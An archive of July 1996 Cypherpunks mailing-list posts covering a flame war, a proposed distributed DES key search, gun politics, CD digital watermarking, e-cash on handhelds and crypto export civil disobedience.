Subject: Re: take the pledge
In-Reply-To: <199607191606.MAA04690@jekyll.piermont.com>
Message-ID: <96Jul23.134038edt.20483@janus.algorithmics.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> In article <v03007603ae1620074ea5@[192.187.162.15]>, David Sternlight <david@sternlight.com> writes:

    >>> Look, folks, we all know that 99% of what David Sternlight posts is
    >>> garbage.

    > Perry is notorious for posting garbage and the above mote in his own eye is
    > a prime example. 99%? Let's see some data and specifics. I'm always willing
    > to discuss substantive disagreements, presented civilly.

    > It's pathetic that Perry, can't even make a rational counter-argument but
    > has to resort to unsupported defamation.

    >> Why don't we all pledge not to answer any of his posts, and
    >> then he'll go away.

    > Nobody compels you to answer any of my posts. Calling for a "pledge" and an
    > organized boycott suggests you are afraid people won't agree with you
    > without trying to make it "politically correct" to do what YOU want. Some
    > freedom-lover you are.

    > The truth is none of my points have been refuted by you, and being unable
    > to deal with rational critical comment, you resort to this.

    > Go for it. I won't mind, and the noise level will go way down, especially
    > among the defamers, who don't respond with much substance anyway.

Sheesh.  Count me in on the pledge.  Note that he _still_ hasn't
responded to the call for him to actually _START_ a thread.

-Robin
PS: He is the first _person_ ever to make my kill file for anything.
_Subjects_, yes, _people_ no.  However, there were 600 new cypherpunks
messages over the last three days, and he seems to be way too much of
it.

I DON'T LIKE SPAM!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 24 Jul 1996 08:28:23 +0800
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: Borders *are* transparent
In-Reply-To: <199607231437.KAA20409@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.SUN.3.91.960723132622.28907A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Jul 1996, Peter D. Junger wrote:
> 
> I am afraid that the number of machines needed would trivialize even
> the most non-trivial cash prize.  But for what its worth, I can give
> you a lot of spare cycles on a couple of 486 Linux boxes.

Not really - you just give the prize to the first person to return the 
correct key (just like a real lottery).

BTW, if you use a central site to allocate ranges to search, this site 
should not know the correct key, as otherwise it could decide who gets 
the chocolate bar with the golden ticket.

If this project is run, I can't see it getting a hit for at least six 
months unless its _really_ well promoted. The java approach would be a cool 
hook - a slowish applet for your web page with something along the lines of

 "You may already have won 20c; whilst you're reading this page, your
computer is playing the cypherpunks challenge. For a better chance of
winning, download this free high performance screen saver and game piece."

Simon

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Wed, 24 Jul 1996 05:28:43 +0800
To: tcmay@got.net (Timothy C. May)
Subject: NOISE: Ayn Rand and smoking (no flame, I promise!) Re: Flaws of Thinkers (Jefferson, Rand, Nietzsche, Voltaire, etc.)
In-Reply-To: <ae196a340e02100466af@[205.199.118.202]>
Message-ID: <199607231140.NAA09926@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity calling itself tcmay@got.net (Timothy C. May) probably
 wrote something like:
>
> (Phill also mentions Rand. She was about as deeply flawed an individual,
> especially in terms of treatment of her supporters, as one can imagine.
> She, for example, insisted that her followers smoke, as smoking is (she
> claimed) proof of Man's dominance over nature. However, many of her ideas
> were very influential.)


I know a lot about Rand, and about her deep flaws as an
individual, especially in terms of treatment of her supporters,
but this is the first I've heard of this one.  Perhaps Tim is
thinking of a play by Murray Rothbard called "Mozart Was a Red" 
in which the Ayn Rand caricature insists that her followers 
smoke.


As for smoking being "proof" of man's dominance over nature,
Rand _did_ believe that in the sense of "demonstration" or
"symbol" but she did not believe that in the rigorous sense of
"proof".


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMfS6EkjbHy8sKZitAQGubgMAzVtEscUNh6B5t2CwrYSw0F+3RMFxpnOG
suVRakUdAUfNAgIzjoCGjqH3s76knprz2Qs1mImLNSECbFrBwuyBSJkHGXfBv22M
2E2e/5B4ytrKeEXbC2bBDlYiobYg90cZ
=ZcTW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 23 Jul 1996 14:52:33 +0800
To: cypherpunks@toad.com
Subject: Preaching to the Choir?
Message-ID: <ae1999321502100470ef@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:44 PM 7/22/96, hallam@Etna.ai.mit.edu wrote:

>Your analyses are almost always junk because you only analyse one
>side of the argument and deny that there is another side. You are
>great at preaching to the choir Perry, problem is that you don't
>convert anyone who isn't already converted.

I think there is very little "converting" of those with well-developed
views, of whichever side. Thus, solid libertarians are not converted by
liberal/left arguments on this list, solid liberals are not converted by
libertarian arguments, and so forth. We've had Religious Right folks
(though not vocally in a long time), Greens, and several other flavors.

(We also have several professional lawyers, law professors, economists, and
the like, and I doubt the beliefs they have settled on in 10 or 20 or more
years of thought will be changed by our arguments.)

What _does_ happen is that people who have not given a lot of thought to
some issues get exposed to views and can decide for themselves. Many
student types arrive on this list with various half-baked ideas about the
role of government, the effectiveness of laws, etc.

_These_ folks are often influenced by persuasive points made here--they
usually recognize the "common sense" in the best arguments presented. (At
least this is what folks have told me, that they came to the list having
ideas that crypto-privacy was important, but not realizing the full
ramifications of the libertarian outlook until exposed to many people
discussing them here.)

So, I don't expect to convert David Sternlight to my views, nor to convert
Phill H.-B. Nor do they, I am sure, expect to convert me. But I _do_ hope
that the arguments here will have an effect on the thinking of many.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Wed, 24 Jul 1996 01:31:38 +0800
To: cypherpunks@toad.com
Subject: Re: Borders *are* transparent
Message-ID: <9607231155.AA21000@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Tue Jul 23 13:52:47 1996
At 10:32 AM 7/22/96 -0006, Peter Trei wrote:
>Any one up for a distributed brute force attack on single DES? My 
>back-of-the-envelope calculations and guesstimates put this on the
>hairy edge of doability (the critical factor is how many machines can
>be recruited - a non-trivial cash prize would help). 

I'm in with:

2x Pentium75
1x 486DX50

(all machines Win NT 4.0, it would have to be an Intel runnable algorithm)

- --------< fate favors the prepared mind >--------
Remo Pini                            rp@rpini.com
PGP:  http://www.rpini.com/remopini/rpcrypto.html
- ------< words are what reality is made of >------
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMfS9FBFhy5sz+bTpAQFV6gf/ZkarvomYeMqyHSGz5yAtLPey6ucFx1AJ
1PfqZV/UJp92d9tX9DmfESHTqZcyCRDHq9+ziDh5vRr5PHovVVOkg9TClssYYk3l
M75EZ20bNohI3ISTH28yUN9H/JdxvlPrDQp7Gwa0LU9QFhBsmpzaLbyL+aas1DA7
sUD6Yc8wBTg95OswYkOqc49DzyEdH6obfL0NhN2QuaSvJDIV/8vfdr08ZhW2ZGfF
TmbGf8z3lWpuZpzhIDRypb74xrg0PJHuvL0OMsEe3HV0euUCpvCwK18YlAaJLoW9
R9Pep6Cq5u+13MDlYM20OZ+RVpUPvKrCY0t0//W8OArgiVCiaC7tVw==
=tUpt
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Wed, 24 Jul 1996 01:02:59 +0800
To: cypherpunks@toad.com
Subject: Re: Borders *are* transparent
Message-ID: <9607231155.AA21003@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Tue Jul 23 13:52:55 1996

> What about the possibility of using DSP's?  Is there any brand of 28.8 K
> modem which uses a "standard" DSP and EPROM firmware?  Such a beast
>  might be 
> the easiest way to get a large amount of CPU horsepower operating 
> independently of the host computer.  DSP's are optimized to execute a
>  large 
> number of instructions with little I/O needs.
> 
> Jim Bell

Zyxel modems (ISDN and V34) have a Motorola 56000 DSP and a Motorola 68000.


- --------< fate favors the prepared mind >--------
Remo Pini                            rp@rpini.com
PGP:  http://www.rpini.com/remopini/rpcrypto.html
- ------< words are what reality is made of >------
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMfS9GBFhy5sz+bTpAQFQbggAp7H0bJyZYUzD87QQorzRQ8PTaTkkB1r3
tsEj6JWmq4PlppRd0lvjP2mN4LmfR700A8O7qdr6d9IfKrNmQzItDEPjq2zv+Lbf
P9e2mi7Jz1xl1faZv3YiBAbdhv/jlnI0m4o3x6AwZNkAy1pe3xkj61H9n8tQ3cqf
eAwDqZlOCCsjuN/hdJAiIHuiuqC2W0i59bZR59u6ek8iXE+8LnXXxeMxuUOZVIgI
2efgoJk6ev5/7IOoDaMlgffkHcWTTnjEClBI3JnGcIOnauacYG8t8UuPa5R8Td0t
ZL/O8/gEDKGpos8j92DSyDgjb6XrRWq3CWZbfoXDhfRbnTKU/ZqXUg==
=2afe
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Wed, 24 Jul 1996 00:44:33 +0800
To: cypherpunks@toad.com
Subject: Returned mail.No such addressee
Message-ID: <9607231156.AA21031@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Tue Jul 23 13:53:56 1996
To: cypherpunks
Date: Tue Jul 23 13:53:09 1996
Check out Pronto Secure (I think there's a mac version around!?)

http://www.commtouch.com/
- --------< fate favors the prepared mind >--------
Remo Pini                            rp@rpini.com
PGP:  http://www.rpini.com/remopini/rpcrypto.html
- ------< words are what reality is made of >------
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMfS9VRFhy5sz+bTpAQHYFQgA1BzJQY9dM29KYpuzdhW9GRG/Ng0M9x5o
d2obC6MWa3th3vCjr3qSb1yC4IKLXLACFvTa4/jHky8P3//3UOUVNZ0IffPSlY9/
a3dKSKFyMUaKtyzi7rzCV24NlBFT1eJVVNZjYsH8pbCGbxteH5+dRAvvbkmSPukX
GGa1oY6u/XK7Ti8IaOifWFDvYi76W37UlLs9aSGAfpTWKlM88bnkUL3iPxHf8qs6
DE0PQZOE8M4JyQTc/H7E5oNkEhE9RxIOgJNpZGPSOazwh3MVjTBLIZZOpmsV3srv
EH6aNobS5shKOs8t/t7aCXIzhvNRDEqB652bfPP79Q13ICOT7BBYyA==
=4iqW
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bill Olson (EDP)" <a-billol@microsoft.com>
Date: Wed, 24 Jul 1996 16:23:32 +0800
To: "'Vinnie Moscaritolo'" <vinnie@webstuff.apple.com>
Subject: RE: SHI_fty
Message-ID: <c=US%a=_%p=msft%l=RED-16-MSG-960723210319Z-36597@tide19.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Vinnie Moscaritolo writes:
<snip>

>>>Uh I think apple had that for a while, it's called cyberdog
>>>http://cyberdog.apple.com screw this ole fud.
>>
>>Very true. But once again, it is not the technology that molds the
>>world, but the exploitation thereof. Welcome to capitalism.
>>>
>
>so shit floats...whats your point?

Let me spell it out for you: M-O-N-E-Y. Shit floats. Apple doesn't...
don't kill the messenger.

			




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 24 Jul 1996 10:32:13 +0800
To: Ernest Hua <hua@chromatic.com>
Subject: Re: [Noise] was Re: Giving 6 year old kids Uzi's
Message-ID: <2.2.32.19960723180827.0085a950@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>At 5:14 PM -0700 7/22/96, Ernest Hua wrote:

>>Or the way many blacks were lynched (physically and socially) in the South.
>>Or the way many asians were segregated.  Or the way many ethnic groups
>>fought each other in inner cities.
>>
>>These are cultural relics of the good ol' days I simply can do without.

Few armed blacks were lynched.  Like--none.  

In any case, posession of machined metal is in no way comparable to
lynching.  Massed armed attacks on people simply because they are alleged to
have possessed machined pieces of metal the size and shape of fifty-cent
pieces (the reason for the BATF attack on the religious community outside of
Waco) *is* comparable to lynching.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 24 Jul 1996 03:06:11 +0800
To: cypherpunks@toad.com
Subject: DAM_lin
Message-ID: <199607231410.OAA19016@pipe4.ny2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-23-96, WaPo: 
 
   "The Cryptography Wars." Op-Ed By Kenneth W. Dam and 
   Herbert S. Lin 
 
      In a June 10 editorial The Post disagreed with the NRC 
      report, suggesting that law enforcement and national 
      security interests require that current restrictions on 
      cryptography be maintained. The Post asserted that it is 
      "too soon" to accept that encryption can help law 
      enforcement and national security. 
 
      But arguing that it is premature to believe some uses of 
      encryption do benefit law enforcement and national 
      security simply denies reality. We emphatically reject 
      The Post's implication that we "sacrificed" law 
      enforcement and national security considerations in 
      favor of economic interests. Indeed, only a fully open 
      and inclusive public discussion can lead to the national 
      consensus upon which any successful cryptography policy 
      will depend. 
 
   ----- 
 
   http://jya.com/damlin.txt  (6 kb) 
 
   DAM_lin 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 24 Jul 1996 09:51:43 +0800
To: cypherpunks@toad.com
Subject: Lawsuit over publishing how-to-murder book
Message-ID: <199607231812.OAA18874@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


>From LI Newsday today, p. 18:

  Suit Follows Muder by the Book
  Publisher of how-to 'Hit Man' manual is blamed in 3 killings

  The Associated Press

  (Greebvelt, Md.) - James E. Perry committed muder by the book.
  Now the book's publisher is accused of aiding and abetting his crimes.
      In a case that legal scholars say could set a precedent in First 
  Amendment law if allowed to proceed, a federal judge yesterday said 
  he would rule in 30 days on a motion against the publisher of "Hit 
  Man: A Technical Manual for Independent Contractors".
  [..]
      The $10, 130-page book has sold 13,000 copies since it was 
  published in 1983 by Paladin Press of Boulder, Colo., a small company 
  that sells mostly through mail orders from its catalog.
  [..]

No mention of the Internet or four-horseman in the article.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Wed, 24 Jul 1996 19:14:28 +0800
To: cypherpunks@toad.com
Subject: Re: Another fascist
Message-ID: <9607231216.AA21784@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Tue Jul 23 14:13:43 1996
It's kind of childish...

(And clumsily done, or else David would never have known)
- --------< fate favors the prepared mind >--------
Remo Pini                            rp@rpini.com
PGP:  http://www.rpini.com/remopini/rpcrypto.html
- ------< words are what reality is made of >------
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMfTB+BFhy5sz+bTpAQGCGAgAvbFSYoLn1aogjB4fIu8RRrCiSVo8zAl+
9ilpfYQ7jaKnzO8kJsz40NWu4jPTYbgqw7wYbw4e37XYGCLdBAqUT/0SSwCF/id2
nyVLU09vGiAtjZUsLTQRjTd2qF89CwcxcEWtEu3LjTKI8z5QD5L+O8yeh444dXbH
Jhu42Cho0gGfAqK8SvzZzX7LDh4N0tQox2s9lc4XqisioBRRI0f4MOEqrOfGz+2/
MWOxaySADXJJ2Xp+yRLhFuH2n92VIenH4lzU2r8dmnGD4/PYoZsE+GSeO5dyohdl
cn4gmB57S5aBsu235eCatqMEtk3auqAJfDCaIInX2rlaZS/47TpTQg==
=iyK1
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 24 Jul 1996 21:41:46 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <199607232114.OAA12350@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  3:38 PM 7/23/96 -0400, hallam@Etna.ai.mit.edu wrote:
>>I don't understand this conclusion.  One book people aside, it is generally
>>believed that humans evolved in an evolutionary context and they certainly
>>frequently use cooperative strategies.  Cooperation usually also involves
>>the ability to sanction misbehavior.  Unilateral disarmament is throwing
>>away your sanction.
>
>That depends on the circumstances. If you are arguing the case for 
>unilateral disarmament or unilateral reduction. In many cases there was a
>deliberated attempt to confuse one with the other. Unilateral 
>reduction can be the right move to make.

No argument.  I said disarmament.


>In the case of a minor nuclear power such as the UK unilateral
>disarmament may be the right move...

But still, the UK has available other sanctions.  That's why they are still
called the Falklands.


>... Burglars are not rational actors, and
>are more likely to have their behavior determined by drugs or
>alcohol than analytical game theory.

Burglars are among the most rational of thieves.  They try to maximize gain
and minimize risk by acting when no one can oppose them.  Even muggers, a
much less rational activity, try to pick on people smaller than them.


>The facts are very clear, if you have a handgun in the house it is
>far more likely to kill a member of the familly than stop an
>intruder. The NRA know this which is why they have lobbied for the
>CDC to stop research in this area - they do not like the facts.

Christmas trees make your house far more likely to catch fire.  However
many people have them because they provide other, hard to quantify, values.
 (BTW, my mother's retirement home does not allow them in individual
units.)  Guns have value besides home defense.  Just one off-the-wall
example: I learned to hold a camera steady by competitive target shooting.

Home defense is not the only reason to have a gun.  (Besides, I would
rather have a shotgun with a short barrel for close-up defense than a
handgun.  As the California police forces discovered when they (briefly)
changed from pump shotguns to "automatics", the sound of chambering a round
with a pump shotgun makes people focus very clearly on their situation. 
Frequently it avoids violence.)

IMHO handguns are much more useful when you need a portable defense.  Examples: 

1. The USGS will allow field geologists to carry handguns in bear country
after a rigorous training program.  

2. I have a friend who defended himself from a pack of feral dogs after
they attacked him and forced him to retreat to the roof of his car.  (He
killed three of the four.  The local rancher treated him to dinner for
ridding the neighborhood of a dangerous nuisance.)


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alex F" <alexf@iss.net>
Date: Wed, 24 Jul 1996 19:52:28 +0800
To: Nathan Syfrig <nsyfrig@condor.depaul.edu>
Subject: Re: Digital Watermarks (long, getting off-topic)
Message-ID: <199607231818.OAA07217@phoenix.iss.net>
MIME-Version: 1.0
Content-Type: text/plain



>  Easy enough.
> 
> - Unless somebody reversed-engineered it, filtered it, and re-stamped it.

Never said that it would be fool proof :)


> - The entertainment industry has a reputation of being paranoid

Sometimes with good reason, just like software producers are paraniod 
about piracy.  Though, the Ent. Ind. does tend to overreact.  IMO the 
copyright laws that are currently in place are enough to protect 
against the forms of piracy that they are trying to protect 
themselves against.  I really don't  think that there is need for new 
legislation or potentially privacy invading practices at this point.  
The forgers of the copyright laws (at least as they relate to music) 
had incredible foresight.  Basically, from the laws that were 
originally drafted (30's maybe?  Then revised in the early '70's at 
least as far as public domain goes) both videos and CDs are 
protected.  These were written when there were no CDs or videos.

>   Some of you may recall 
>   the flap over DAT, which significantly reduced the consumer market 
>   penetration (the industry itself uses them all over the place).

The Ent. Ind. got what they wanted though.  There are taxes, etc. 
(some sort of import restrictions anyway) that keep DAT player/recorder 
devices at around $700 per unit.  By this time normally the prices 
*should* be down to like $200 (using the CD industry as a guide)

DATs are used all over the industry because they are cheap (see 
below), and because going from analog tape to DAT for CD mastering is 
a million times easier then sending off reels of analog tape, even if 
the tape is a properly mixed down duplicate of the master.  There are 
still track times, numbers, etc., etc.  A HUGE pain in the ass for CD 
manufacturers, but easy to do on a one-off basis in the studio where 
the producer & artist can sit there and help mix, fix tracks, select 
times, indexes, etc., etc.  It can all be done to a single DAT 
)(which would then be copied for safety) and set along with a time 
code sheet.


>   (you still 
>   have the even-less-effective argument of the associated cover art not 
>   being included or being scanned and duplicated with reduced signal 
>   quality, unless the distribution is all on-line).

Cover art is pretty easy to duplicate if you have access to a color 
laser printer.  Just scan the original in at 300dpi, and print it out 
at the same resolution/size and you have it.  Just don't scan it in 
as a .GIF :) (too few colors)

 
>  Probably not done that way.  My guess is that the disk ID is assigned
>  to the disk at the time of manufacturing.  At the point of purchase
>  the customer is forced to give name, address, ID, whatever.  This is
>  then stored in a database 
> 
> - Would YOU want to be responsible for maintaining that database?  It's 
>   like maintaining a hardware store trying to maintain an ID on every 
>   single screw and nail in inventory.

You would run into the same problems if it were done by CC.  
Hopefully the industry will do some sort of a cost-analysis (an 
accurate one) and realize that they would spend more on this than 
they lose (esp. since they still wouldn't eliminate piracy, just make 
it a little more difficult).


> - Nobody's going to try and do a higher-frequency encoding (I HOPE).  While 
>   the human ear cannot hear those frequencies directly, we have found out 
>   that those higher-frequencies interact in such a way to influence the 
>   sound waves that influence what the user can hear. 

Yes, that's true.  Anyone ever hear of HAARP?  :)  Certain 
frequencies can affect the brain in certain ways (a guy by the name 
of Robert A Monroe, while maybe a little eccentric, has been using 
this method since the 50's to do things like keep people awake when 
they are sleepy, vice versa, etc.).  Also the body.  Your body parts 
resonate a certain frequencies.  For example, there is a very low 
note (I believe that it is a B) that vibrates at the same frequency 
as your bowels.  Play that note, and you loose control... :) (If 
anyone knows this frequency, PLEASE let me know.  I'm serious :) ).

 This is the reason 
>   there's still a debate between digital and analog recordings, and is 
>   still a big reason a lot of artists still record on analog equipment 
>   (in musical "fuzzy" terms, it's equated with the warmth of the sound, 
>   sort of like the tube-amp vs. solid-state amp debate among some guitar 
>   players, etc.)  If somebody deliberately played with such frequencies, 
>   the journalistic media would probably have a field day.  Yes, there are 
>   audio cancelling and other tricks that could be deployed, but no matter 
>   what, you're still deliberately introducing signal noise

I touched on that in my other posting.  The real difference between 
analog vs. digital is actually 2 things; static and musical 
"overtones" (used to produce various distortion effects and feedback, 
for example.  ANyone who has listened to Robin Trower, Hendrix, Van 
Halen, etc. knows).

People *are* playing with these frequencies.  It's known as COSM or 
Composite Object Sound Modeling, and apparently is fuzzier (as in 
fuzzy logic, not fuzzy sound) than cold sampling is.  Companies like 
Roland and Line6 are playing with such things.  Roland is really 
doing some amazing things with this technology.


>   If I remember correctly, there is plenty of room in the design of the 
>   audio CD protocal to embed such information, just like you can embed 
>   the timing and track number information. 

Yeah, that's something else too.  I'm not sure exactly how that 
works, but I *think* it's like a 1Khz or 1 hz signal that signals 
this.  At least it is for the start of the first track on a cd.  In 
the manufacturing process, at least

> - Well, the MASS market piraters are exactly the point.  Well, let's face 
>   it, if the industry controllers got their way, there would be no 
>   second-hand market like garage sales - there IS money involved here 
>   (witness the bizarre dealings with CD-rental stores that have shown up 

The thing is, there is no money lost, really.  Think about it.  In 
order for one CD to be bought at a garage sale, someone else had to 
buy it at a retail store.  If the record companies were in the used 
CD business then there may be money lost, but otherwise.  The place 
where real money is lost is sale of promo CDs (many say "Promotional 
copy.  Not for sale" on them).  Here the record company loses 
nothing.  The artist loses big time.  With the exception of Sony 
records, most record companies will only pay artists royalties on 85% 
of records sold.  The other 15% is said to be "promotional material" 
which is a huge scam run by the recording industry to take advantage 
of the artists.  These 15% are still paid for (manufacturing, etc.) 
by the artist, and are given away to radio stations, etc.  There is 
where the real money is lost.  The rest is lieing with numbers.

Getting off topic,

Alex F
=-=-=-=-=-=-=-=-=-=-=-=-=-
Alex F    alexf@iss.net
Marketing Specialist
Internet Security Systems
=-=-=-=-=-=-=-=-=-=-=-=-=-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alex F" <alexf@iss.net>
Date: Wed, 24 Jul 1996 11:37:14 +0800
To: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Subject: Re: Digital Watermarks for copy protection in recent Billbo
Message-ID: <199607231826.OAA07345@phoenix.iss.net>
MIME-Version: 1.0
Content-Type: text/plain



> Sniffers aren't much effort, and if I sniff your tagged purchases and 
> put them out over the net anonymously, they are traced to you.

Actually I was thinking more along the lines of physically stealing, 
but if someone sniffed an electronic transfer of a record then the 
laws would become even more useless as far as enforcement goes.


> Probably, but the Billboard article discussed using CC numbers as an 
> ID in the online watermarked transactions.  Doesn't mean they were 
> correct, of course.

Considering that their sources are probably more reliable (even 
though less knowledgable), and considering the idiocy of such an 
idea, I would risk saying that they are right :)


> AFAIK, most "bootlegging" is of unreleased concerts or out-takes. 
> Digital watermarks would be of little use.

There are solutions to this that work.
1) The Greatful Dead approach - let everyone bootleg live shows.  Who 
cares?

2) The Frank Zappa Approach - take the bootlegged copies, use better 
equipment, and possibly your own soundboard recordings of the same 
show, and put them out yourself.  Since you are capable of putting 
out a better product sonically, then beat them at their own game 
("Beat the Boots")

Alex F
=-=-=-=-=-=-=-=-=-=-=-=-=-
Alex F    alexf@iss.net
Marketing Specialist
Internet Security Systems
=-=-=-=-=-=-=-=-=-=-=-=-=-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Anderson <ota+@transarc.com>
Date: Wed, 24 Jul 1996 06:24:55 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: Netscape
In-Reply-To: <v02120d04ae1763d7df01@[192.0.2.1]>
Message-ID: <wlxFesaSMV0_0MiE40@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


David Sternlight <david@sternlight.com> writes:
> >I must agree with Lucky.  I am quite sure that even if Netscape was not
> >begin distributed over the net, copies would still be uploaded to
> >international sites by folks practicing Civil disobedience.
> 
> To call simple lawbreaking by cowards working in secret "civil
> disobedience" is to defame the name of Gandhi, King, and all the legitimate
> protesters of modern history. Civil disobedience must be seen publicly, and
> must be done by observable individuals. Masked men throwing stink bombs is
> not civil disobedience--it's hooliganism.

As you can clearly see I did *not* suggest that the software needed to
be uploaded anonymously.  I agree that public disobedience has a much
large impact than private disobedience, but I think the value of private
disobedience is still positive.

Uploading critical software which computer users can access accross the
globe, important as it is, is not an ideal method of practicing (or
mispracticing if you prefer) Civil Disobedience.  The problem is that
only a single copy only needs to be uploaded and only one person really
gets "credit" for the upload.

Better is something like Vince Cate's "Arms Trafficker" page:
    http://online.offshore.com.ai/arms-trafficker/
I am there at #172 striking a tiny but not invisible blow for freedom.

172 Mon May  6  7:56:39 1996 Ted Anderson <ota+@transarc.com> user-168-121-79-76.dialup.mindspring.com  168.121.79.76

Ted Anderson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Wed, 24 Jul 1996 18:13:12 +0800
To: cypherpunks@toad.com
Subject: Re: E-Cash promotion idea
In-Reply-To: <v02120d23ae1ab020406e@[192.0.2.1]>
Message-ID: <4t3ges$afu@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <v02120d23ae1ab020406e@[192.0.2.1]>,
Lucky Green <shamrock@netcom.com> wrote:
>At 23:19 7/22/96, Anonymous wrote:
>
>>How about getting the CyberCafes to accept ecash?  Just pull out your
>>Newton/HP48/PDA and point the IR beam at the cash register.  Now that's
>>an ecash application I'd like to see!!
>
>So would I. And one day we will. Though not not on the HP48.
>
Hey!  I've got one of those HP48's, and I'd love to use it for ecash.
Why do you reject it out of hand?

(and what if I'm _willing_ to wait however many hours to create a payment...
:-) (note that if you know what you're going to buy, payments can be created
offline, and the HP becomes simply a transport mechanism))

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfVFE0ZRiTErSPb1AQHxcQP+J0iyGhoEQAQEWaZyAj6piGubVnNOaGIV
MIkfAeUrr117DY6WPYafgTP+zKJrD6KzmKuHfurPYWXwcLCskCmUTeJGKt73tBFf
Obici9Cs/eT8m8Kz/33ae1qA2CJdJ2gT3nc3sVFENkotkxm8Xx5R6Nc125dm6i/S
m+e5A+2GA5A=
=OS3v
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alex F" <alexf@iss.net>
Date: Wed, 24 Jul 1996 20:36:55 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Digital Watermarks for copy protection in recent Billbo
Message-ID: <199607231840.OAA07655@phoenix.iss.net>
MIME-Version: 1.0
Content-Type: text/plain


> >  People buying CDs at a garage sale & getting arrested for
> >piracy.  Wonderful.
> 
> Arrests like this are uncommon. Even buying "cheap bikes" and other "cheap"
> (= probably stolen and fenced) merchandise almost never subjects the
> purchaser to criminal sanctions.

Yes, but concievably if (whoever would be incharge, FBI?) *could*, 
under law do this, even if they are wrong.  It is a lot harder to 
prove that they intentionally harrassed *you* than it is for them to 
say that they were following leads and show evidence.  Yes, this may 
never happen, but the mere fact that it *could* is uncomforting.  
